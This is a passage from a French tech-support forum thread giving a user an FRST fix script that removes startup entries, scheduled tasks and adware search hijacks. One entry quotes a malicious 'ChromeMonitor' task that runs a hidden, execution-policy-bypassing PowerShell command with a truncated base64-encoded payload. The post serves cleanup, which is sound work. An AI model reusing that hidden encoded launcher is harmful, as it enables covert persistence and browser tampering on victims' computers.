Powershell et windows systeme 32 se lancent tout seul

Attention, attendre que les messages disant que l'analyse est terminée s'affichent

.
Ensuite envoie les rapports FRST et ADDITION sur CJOINT

Start::
CreateRestorePoint:
CloseProcesses:
HKLM\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (Pas de fichier)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2133728 2017-09-12] (Wondershare Technology Co.,Ltd -> Wondershare)
HKLM\...\Run: [RtkAudUService] => "C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_d92d7bec4b020758\RtkAudUService64.exe" -background (Pas de fichier)
HKU\S-1-5-21-4008291486-4279443762-1799469733-1001\...\Run: [com.blitz.app] => C:\Users\timot\AppData\Local\Programs\Blitz\Blitz.exe --autostart (Pas de fichier)
Task: {5474976A-EB58-436E-9139-EF1C08AF8641} - System32\Tasks\Opera scheduled Autoupdate 1546342114 => C:\Users\timot\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (Pas de fichier)
Task: {7A67118B-C8C1-41CF-A757-E8FD4A9EAE10} - System32\Tasks\ChromeMonitor => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (l'élément de données a 4315 caractères en plus).
Task: {291F6BC9-23BD-4C65-B58D-0EDD3E10CE06} - System32\Tasks\Nahimic2UILauncherRun => C:\Program Files\Nahimic\Nahimic2\UserInterface\Nahimic2UILauncher.exe $(Arg0) $(Arg1) $(Arg2) $(Arg3) $(Arg4) $(Arg5) $(Arg6) $(Arg7) (Pas de fichier)
Task: {3C84615B-7AA9-4AEB-ABC7-716C7644D482} - System32\Tasks\Nahimic2svc32Run => C:\Program Files\Nahimic\Nahimic2\UserInterface\Nahimic2svc32.exe $(Arg0) $(Arg1) $(Arg2) $(Arg3) $(Arg4) $(Arg5) $(Arg6) $(Arg7) (Pas de fichier)
Task: {5474976A-EB58-436E-9139-EF1C08AF8641} - System32\Tasks\Opera scheduled Autoupdate 1546342114 => C:\Users\timot\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (Pas de fichier)
Task: {8879A641-F223-4CFD-8406-8C9619AFEC17} - System32\Tasks\Opera scheduled Autoupdate 1638119657 => C:\Users\timot\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (Pas de fichier)
Task: {8DD09889-8CC4-4F2E-8A25-6742A64718DE} - System32\Tasks\MSI_Help_Desk_Agent => C:\Program Files (x86)\MSI\Help Desk\MSI Update Agent.exe (Pas de fichier)
Task: {D0426748-2527-4CDF-9808-B4707D41D84F} - System32\Tasks\Opera scheduled Autoupdate 1595072908 => C:\Users\timot\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (Pas de fichier)
Task: {D16B22D2-5707-440F-9669-424FFB13CC69} - System32\Tasks\Nahimic2svc64Run => C:\Program Files\Nahimic\Nahimic2\UserInterface\x64\Nahimic2svc64.exe $(Arg0) $(Arg1) $(Arg2) $(Arg3) $(Arg4) $(Arg5) $(Arg6) $(Arg7) (Pas de fichier)
S2 RtkAudioUniversalService; "%SystemRoot%\System32\DriverStore\FileRepository\realtekservice.inf_amd64_d92d7bec4b020758\RtkAudUService64.exe" [X]
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://fr.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_aeuhewiom1bdfhjlntz65m_19_01¶m1=1¶m2=f%3D1%26b%3DIE%26cc%3Dfr%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzutAtDzy0CtBtAtCyCtDyEtBtDyBzy0ByBtN0D0Tzu0StByDyDyBtN1L2XzuyEtFtAtCtFtDtFzytAtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2SyCtCyEyCyEyEzztCtGyDyCyEtAtGyB0DtAtAtGtD0C0DyBtGtCzy0CyBtAyB0B0E0AtD0Ezz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEyDtAtDyEtB1QtBtG1SyC1R1PtGyE1TtDtDtGzyyEtCzztG1OyC1OtByB1OyD1TtCtByByD2QtN0A0LzuyEtN1B2Z1V1T1S1NzutN1Q2Z1B1P1RzutCyDyEyCtAyEtBtDzyyC%26cr%3D913876613%26a%3Dwny_aeuhewiom1bdfhjlntz65m_19_01%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
HKU\S-1-5-21-4008291486-4279443762-1799469733-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://fr.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wsg_mjphgwgm1y1zvrq88_19_44_ssg00¶m1=1¶m2=f%3D1%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzutAtDzy0CtBtAtCyCtDyEtBtDyBzy0ByBtN0D0Tzu0StBzzyDzztN1L2XzuyEtFyDyBtFtDtFyDyDtN1L1Czu1BtCtN1L1G1B1V1N2Y1L1Qzu2StC0FyD0BtAtBzy0FtGtCtB0FtAtGyByBtC0EtGyBzyzztCtG0ByD0A0AyEyCzz0C0BzzyDyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEyDtAtDyEtB1QtBtG1SyC1R1PtGyE1TtDtDtGzyyEtCzztG1OyC1OtByB1OyD1TtCtByByD2QtN0A0LzuyEtN1B2Z1V1T1S1NzutN1Q2Z1B1P1RzutCyDyBtBtAzztCtCtDyB%26cr%3D300362490%26a%3Dwsg_mjphgwgm1y1zvrq88_19_44_ssg00%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
SearchScopes: HKLM -> DefaultScope {45690C11-53CA-442C-B19C-6F94D0DAFB66} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {45690C11-53CA-442C-B19C-6F94D0DAFB66} URL = 
SearchScopes: HKU\S-1-5-21-4008291486-4279443762-1799469733-1001 -> DefaultScope {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wsg_mjphgwgm1y1zvrq88_19_44_ssg00¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzutAtDzy0CtBtAtCyCtDyEtBtDyBzy0ByBtN0D0Tzu0StBzzyDzztN1L2XzuyEtFyDyBtFtDtFyDyDtN1L1Czu1BtCtN1L1G1B1V1N2Y1L1Qzu2StC0FyD0BtAtBzy0FtGtCtB0FtAtGyByBtC0EtGyBzyzztCtG0ByD0A0AyEyCzz0C0BzzyDyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEyDtAtDyEtB1QtBtG1SyC1R1PtGyE1TtDtDtGzyyEtCzztG1OyC1OtByB1OyD1TtCtByByD2QtN0A0LzuyEtN1B2Z1V1T1S1NzutN1Q2Z1B1P1RzutCyDyBtBtAzztCtCtDyB%26cr%3D300362490%26a%3Dwsg_mjphgwgm1y1zvrq88_19_44_ssg00%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-4008291486-4279443762-1799469733-1001 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wsg_mjphgwgm1y1zvrq88_19_44_ssg00¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzutAtDzy0CtBtAtCyCtDyEtBtDyBzy0ByBtN0D0Tzu0StBzzyDzztN1L2XzuyEtFyDyBtFtDtFyDyDtN1L1Czu1BtCtN1L1G1B1V1N2Y1L1Qzu2StC0FyD0BtAtBzy0FtGtCtB0FtAtGyByBtC0EtGyBzyzztCtG0ByD0A0AyEyCzz0C0BzzyDyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEyDtAtDyEtB1QtBtG1SyC1R1PtGyE1TtDtDtGzyyEtCzztG1OyC1OtByB1OyD1TtCtByByD2QtN0A0LzuyEtN1B2Z1V1T1S1NzutN1Q2Z1B1P1RzutCyDyBtBtAzztCtCtDyB%26cr%3D300362490%26a%3Dwsg_mjphgwgm1y1zvrq88_19_44_ssg00%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
2021-11-28 18:12 - 2021-11-28 18:12 - 002842672 _____ (DT001) C:\Users\timot\AppData\Local\setup15364.exe
2020-07-18 12:46 - 2020-07-18 12:46 - 002931720 _____ (DT001) C:\Users\timot\AppData\Local\setup23860.exe
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Pas de fichier
ContextMenuHandlers1: [QM] -> {C00E2DB5-3AF8-45a6-98CB-73FCDE00AC5C} => D:\MyGames\Quick Macros 2\ver 0x2040A00\qmshex64.dll -> Pas de fichier
ContextMenuHandlers2: [QM] -> {C00E2DB5-3AF8-45a6-98CB-73FCDE00AC5C} => D:\MyGames\Quick Macros 2\ver 0x2040A00\qmshex64.dll -> Pas de fichier
ContextMenuHandlers4: [QM] -> {C00E2DB5-3AF8-45a6-98CB-73FCDE00AC5C} => D:\MyGames\Quick Macros 2\ver 0x2040A00\qmshex64.dll -> Pas de fichier
ContextMenuHandlers5: [QM] -> {C00E2DB5-3AF8-45a6-98CB-73FCDE00AC5C} => D:\MyGames\Quick Macros 2\ver 0x2040A00\qmshex64.dll -> Pas de fichier
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [468]
SearchScopes: HKLM -> DefaultScope {45690C11-53CA-442C-B19C-6F94D0DAFB66} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {45690C11-53CA-442C-B19C-6F94D0DAFB66} URL = 
OPR DefaultSuggestURL: Opera Stable -> hxxps://ff.search.yahoo.com/gossip?output=fxjson&command={searchTerms}
Edge HomeButtonPage: HKU\S-1-5-21-4008291486-4279443762-1799469733-1001 -> hxxp://www.recherche-fr.com/
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (AdBlock — best ad blocker) -> EdgeExtension_BetaFishAdBlock_c1wakc4j0nefm => C:\Program Files\WindowsApps\BetaFish.AdBlock_2.13.0.0_neutral__c1wakc4j0nefm [2020-12-17]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
Edge HomePage: Default -> hxxp://www.recherche-fr.com/
Edge StartupUrls: Default -> "hxxp://www.recherche-fr.com/"
Edge DefaultSearchURL: Default -> hxxp://www.recherche-fr.com/search?q={searchTerms}
Edge DefaultSearchKeyword: Default -> recherche-fr.com
CHR Notifications: Default -> hxxps://aternos.org; hxxps://forums.commentcamarche.net; hxxps://maranhesduve.club; hxxps://www1a.michellehardin.pro; hxxps://www1p.delmarmora.pro
CHR HomePage: Default -> hxxp://www.recherche-fr.com/
CHR StartupUrls: Default -> "hxxp://www.recherche-fr.com/"
CHR DefaultSearchURL: Default -> hxxp://www.recherche-fr.com/search?q={searchTerms}
CHR DefaultSearchKeyword: Default -> recherche
CHR HKLM-x32\...\Chrome\Extension: [gnplhahbcoldbildffdchneaepapccbn]
CHR DefaultSearchURL: Profile 3 -> hxxps://www.searchmr.com/?q={searchTerms}
CHR DefaultSuggestURL: Profile 3 -> hxxps://searchmr.com/?s={searchTerms}
C:\WINDOWS\system32\Tasks\ChromeMonitor
cmd: netsh advfirewall reset
Hosts:
EmptyTemp:
End::

Une fois ton ordinateur redémarré :

IMPORTANT :

6- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT

POUR INFORMATION: